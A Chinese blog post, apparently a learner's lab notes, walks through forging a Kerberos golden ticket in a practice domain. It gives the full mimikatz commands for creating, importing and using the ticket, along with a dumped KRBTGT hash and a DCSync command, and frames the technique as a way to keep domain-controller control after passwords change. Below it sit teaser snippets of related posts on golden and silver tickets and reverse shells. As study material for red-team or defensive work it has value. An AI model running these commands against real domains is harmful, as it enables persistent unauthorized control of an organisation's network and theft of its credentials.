内网渗透--黄金票据

已于 2022-05-23 08:55:23 修改
阅读量1.7k 收藏 3
点赞数
文章标签: 安全 web安全 哈希算法
于 2022-05-23 00:01:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45875169/article/details/124918522
版权

域渗透-----黄金票据的使用

前言

今天主要学习内容为黄金票据的制作,黄金票据主要是权限维持,因为经验少,所以一直不明白一个问题,就是在制作黄金票据时候需要KRBTGT的hash,KRBTGT的hash需要域控权限,而且每张黄金票据制作后仅可维持十个小时,那么黄金票据的主要作用是什么?是hw时管理员突然改域控密码,此时黄金票据可以维持权限、继续渗透嘛?

Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由域Kerberos帐户(KRBTGT)加密和签名的。TGT仅用于向域控制器上的KDC服务证明用户已被其他域控制器认证。TGT被KRBTGT密码散列加密并且可以被域中的任何KDC服务解密的。

票据制作

票据制作需要以下几点:
1、域名称
2、域的SID值
3、域的KRBTGT账户密码HASH
4、伪造用户名,可以是任意的

靶场为红日靶场

1、获取域名称
在获取到权限的普通机器执行systeminfo
在这里插入图片描述
2、获取域的sid值
使用命令whoami /all
在这里插入图片描述
sid值为S-1-5-21-2952760202-1353902439-2381784089-500
500指的是权限,后面制作时候不需要加上500

3、域的KRBTGT账户密码HASH
在域控机器下执行命令获取hash,使用mimikatz获取hash时候,需要管理员权限运行,并且privilege::debug,提升权限。
在这里插入图片描述
hash值为58e91a5ac358d86513ab224312314061,一般运维人员不会修改此账号的hash,因此可一直利用此hash对域控进行控制。

4、高权限票据的制作
在普通机器输入
kerberos::golden /admin:administrator /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /ticket:0522.kiribi

在这里插入图片描述
此时目录下生成新的文件
在这里插入图片描述
然后我们再把 0522.kribi 利用mimikatz 进行导入

kerberos::purge #清空已有票据
在这里插入图片描述
kerberos::ptt 0522.kiribi #导入票据
在这里插入图片描述
kerberos::list # 查看票据
在这里插入图片描述
此时在命令窗口输入lsadump::dcsync /domain:god.org /user:krbtgt,因为之前在导入票据前输入该命令报错,因为权限不足
此时输入命令
在这里插入图片描述
发现可成功查询

总结

综上,算是可以对黄金票据的制作流程有了了解,可用于长期维持域控权限,因为域控密码虽然修改,或控制域控的漏洞被修复,但若KRBTGT的hash不变,则可一直维持域控权限。其实还可以直接使用cs插件直接制作黄金票据,这里便不做过多介绍。

小白白白白才菜
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
ISC-内网渗透 -最终版.pdf
最新发布
04-08
ISC-内网渗透 -最终版
黄金票据制作原理及利用方式
Happy峰
09-23 2689
Golden Ticket黄金票据制作原理及利用方式 Krbtgt账户介绍 krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成 的,无法登录主机 黄金票据原理 TGT=Krbtgt的html hash 加密 1、Kerberos中的TGT和Logon Session Key(CT_SK)是AS返回的 ,TGP它是由Krbtgt加密和签名的 ,krbtgt的NTLM Hash又是固定的,而CT_SK并不会保存在KDC中。 2、所以只要得到krbtgt
黄金票据的原理和使用
qq_45455136的博客
09-28 1205
krbtgt用户是系统在创建域时自动生成的账号,密码是随机生成的,无法登录主机,是KDC(密钥分发中心)的服务账号。在域环境中,每个用户账号的票据都是由 krbtgt 用户所生成的 TGT票据加密使用的TGS(票据授予服务器)密码就是krbtgt用户的NTLM Hash Kerberos中的TGT和CT_SK是AS(认证服务器)返回的,TGT是由krbtgt加密和签名的,krbtgt的NTLM Hash是固定的,CT_SK不会保存在KDC中 得到krbtgt的NTLM Hash就可以伪造
内网安全-黄金票据和白银票据
qq_52263650的博客
07-31 323
前置知识是需要熟悉Kerberos协议的认证流程,可以看前一篇文章。
黄金票据的生成
m0_69801663的博客
12-19 984
黄金票据的生成
内网渗透——黄金票据与白银票据
来日可期的博客
10-11 2711
黄金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境中域控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有域内的最高权限,攻击者可以访问和控制所有域内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的
内网渗透测试-外链.pdf
05-04
内网渗透测试-外链.pdf
内网渗透专用-mimikatz
05-06
内网渗透是网络安全领域中的一个关键话题,主要涉及在企业内部网络中进行合法的安全测试或非法的攻击行为。"mimikatz"是一款著名的开源工具,由法国安全研究员Benjamin Delpy开发,用于提取Windows操作系统中的明文...
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
【红蓝对抗之Windows内网渗透】是一种网络安全实践,旨在暴露系统漏洞并提高安全防护能力。在企业环境中,外部防御通常严密,但内部网络的安全状况可能相对较弱,因此攻击者常利用员工电脑、外网服务或WiFi等途径...
权限维持-黄金票据
m0_64815693的博客
06-04 251
权限维持-黄金票据
黄金票据和白银票据详解
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
06-22 5291
在 Windows 系统中,存在许多突破用户权限或绕过系统保护机制的漏洞,攻击者可以通过利用这些漏洞,提升自己的权限并获取黄金票据。​ Golden Ticket是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。​ 每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,我们如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET,
Hvv(二)
qq_53142368的博客
06-25 1070
安全
【域权限维持】-黄金票据
qq_41617902的博客
11-07 1275
Windows域权限维持-黄金票据
[内网渗透]—票据传递
Sentiment的博客
12-08 769
之前我们在哈希传递篇就介绍到,要想使用mimikatz的哈希传递功能,就必须具有本地管理员的权限。但是在实际的渗透环境中,我们更多的是得到一个低权限的域账户而已。mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法,如票据传递(Pass The Ticket)。
域权限维持-黄金/白银票据详解
good good study
04-19 2055
在域环境中进行权限维持,谈的比较多的便是票据,分为白银票据黄金票据, 其原理都是基于Kerberos认证。黄金票据伪造的是域管下发给用户的TGT,而白银票据则是伪造的 ST。
内网渗透之权限维持-黄金白银票据&隐藏账户&远控-RustDesk&GotoHTTP
m0_62207170的博客
05-18 931
内网渗透之权限维持-黄金白银票据&隐藏账户&远控-RustDesk&GotoHTTP
内网渗透备忘录
莫慌的博客
09-30 677
内网渗透常用命令备忘
内网渗透黄金票据
m0_70349048的博客
03-31 540
所以黄金票据攻击,并不是一种普通的攻击方式,该攻击方式其实是一种后门的形式,属于第二次进行攻击的方法,第一次拿到域管权限之后,需要将krbtgt hash进行保存,当第二次再来进行渗透攻击时,我们就可以使用krbtgt hash制作黄金票据,从而获得管理员权限。黄金票据生成,是生成有效的TGT Kerberos票据,并且不受TGT生命周期的影响(TGT默认10小时,最多续订7天),那么,这里可以为任意用户生成黄金票据,就可以为域管理员生成TGT,普通用户就可以变成域管理员。黄金票据是用来维持权限的手段。
内网渗透--ICMP隧道
05-16
ICMP隧道是一种利用Internet控制消息协议(ICMP)的技术,将其他协议的数据包封装在ICMP数据包中,从而在不被检测的情况下在网络中传输数据。对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕过防火墙和其他网络安全设备的检测和过滤。 ICMP隧道的实现需要两个端点:一个客户端和一个服务器端。客户端将要传输的数据封装在ICMP数据包中发送给服务器端,服务器端接收到ICMP数据包后解析其中的数据,然后将数据还原成原始数据包,再转发给目标主机。通过这种方式,攻击者可以在内网中传输各种类型的数据,包括命令和控制信息。 然而,ICMP隧道也有缺点。由于ICMP数据包通常被认为是网络的一部分,因此可能不会被网络安全设备视为可疑流量。然而,如果攻击者的网络流量被监测到,这种技术可能被检测出来,因此需要谨慎使用。此外,ICMP隧道还可能会导致网络延迟和丢包等问题,影响传输速度和数据完整性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值